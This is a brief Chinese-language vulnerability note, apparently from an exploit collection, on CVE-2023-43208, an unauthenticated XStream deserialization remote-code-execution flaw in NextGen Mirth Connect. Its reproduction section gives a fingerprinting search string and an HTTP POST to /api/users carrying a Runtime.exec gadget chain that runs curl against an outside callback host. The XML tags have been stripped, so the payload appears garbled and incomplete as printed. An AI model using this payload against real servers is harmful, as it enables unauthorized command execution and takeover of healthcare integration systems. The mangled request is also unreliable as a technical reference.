# NextGen Mirth Connect XStream存在反序列化远程代码执行漏洞
# 一、漏洞简介
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208),未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。
# 二、影响版本
+ `title="Mirth Connect Administrator"`
+ 特征

# 三、漏洞复现
```plain
POST /api/users HTTP/1.1
Host:
X-Requested-With: OpenAPI
Content-Type: application/xml
abcd
java.lang.Comparable
java.lang.Runtime
getMethod
java.lang.String
[Ljava.lang.Class;
getRuntime
invoke
java.lang.Object
[Ljava.lang.Object;
exec
java.lang.String
curl http://jveuewgzdi.iyhc.eu.org
transform
compareTo
```

> 更新: 2024-11-27 10:01:46
> 原文: